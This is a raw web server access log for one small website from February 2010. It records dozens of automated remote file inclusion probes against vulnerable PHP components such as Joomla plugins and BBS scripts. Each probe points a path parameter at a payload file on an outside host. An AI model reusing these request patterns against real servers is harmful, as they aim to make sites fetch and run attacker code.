61.250.92.167 - - [06/Feb/2010:07:06:12 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:07:07:28 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:07:09:20 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:07:10:36 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:07:14:23 -0800] "GET /logs/access.log/errors.php?error=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:07:28:38 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:07:28:47 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:07:28:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:07:28:55 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.60.28.10 - - [06/Feb/2010:08:18:41 -0800] "GET /bughttp://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "allattitudedoxies.com"
211.60.28.10 - - [06/Feb/2010:08:18:41 -0800] "GET /logs/bughttp://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:21:52 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:21:52 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:21:52 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:21:57 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:21:57 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:21:57 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:22:06 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:22:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:22:06 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:22:15 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:22:15 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:22:15 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:08:23:44 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:08:23:44 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.227.251.152 - - [06/Feb/2010:08:23:44 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:24:02 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:24:03 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:24:03 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:24:04 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:24:04 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:24:05 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:24:47 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:24:47 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:24:47 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:25:23 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:25:23 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:25:23 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:26:33 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:26:33 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:26:33 -0800] "GET /logs/access_091002.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:27:23 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:27:23 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.106.29.8 - - [06/Feb/2010:08:27:23 -0800] "GET /logs/access_091002.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:27:52 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:27:52 -0800] "GET /logs/access_091002.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.98.23.9 - - [06/Feb/2010:08:27:52 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:33:58 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:33:58 -0800] "GET /logs/access_091002.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:08:33:58 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
89.36.175.10 - - [06/Feb/2010:08:40:09 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
89.36.175.10 - - [06/Feb/2010:08:40:09 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
89.36.175.10 - - [06/Feb/2010:08:40:09 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
89.36.175.10 - - [06/Feb/2010:08:42:02 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
89.36.175.10 - - [06/Feb/2010:08:42:02 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
89.36.175.10 - - [06/Feb/2010:08:42:02 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
216.17.109.216 - - [06/Feb/2010:08:53:34 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
216.17.109.216 - - [06/Feb/2010:08:53:34 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
216.17.109.216 - - [06/Feb/2010:08:53:34 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
216.17.109.216 - - [06/Feb/2010:08:54:01 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
216.17.109.216 - - [06/Feb/2010:08:54:01 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
216.17.109.216 - - [06/Feb/2010:08:54:01 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:05:16 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:05:16 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:05:16 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:06:01 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:06:01 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:06:01 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
211.108.61.176 - - [06/Feb/2010:09:12:25 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
211.108.61.176 - - [06/Feb/2010:09:12:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 924 "-" "libwww-perl/5.79" "allattitudedoxies.com"
211.108.61.176 - - [06/Feb/2010:09:12:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 1516 "-" "libwww-perl/5.79" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:09:15:30 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:09:15:30 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:09:15:30 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:16:22 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:16:23 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:16:23 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:16:25 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:16:25 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:16:25 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
180.68.206.252 - - [06/Feb/2010:09:28:59 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:09:38:57 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:09:38:57 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:09:38:57 -0800] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.80.108.81 - - [06/Feb/2010:09:42:17 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.80.108.81 - - [06/Feb/2010:09:42:17 -0800] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
220.80.108.81 - - [06/Feb/2010:09:42:17 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:09:46:19 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:09:46:19 -0800] "GET //vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.95.78.56 - - [06/Feb/2010:09:46:19 -0800] "GET /logs///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:09:49:13 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:52:30 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:52:30 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:09:52:30 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:09:56:30 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:09:56:30 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:09:56:30 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:09:56:53 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:09:56:53 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:09:56:53 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:09:58:12 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:09:58:18 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:09:58:19 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:10:01:58 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:10:01:58 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:10:01:58 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
174.121.45.220 - - [06/Feb/2010:10:04:17 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
174.121.45.220 - - [06/Feb/2010:10:04:17 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
174.121.45.220 - - [06/Feb/2010:10:04:17 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:05:16 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:05:17 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:10:05:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
193.47.80.43 - - [06/Feb/2010:10:06:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.allattitudedoxies.com"
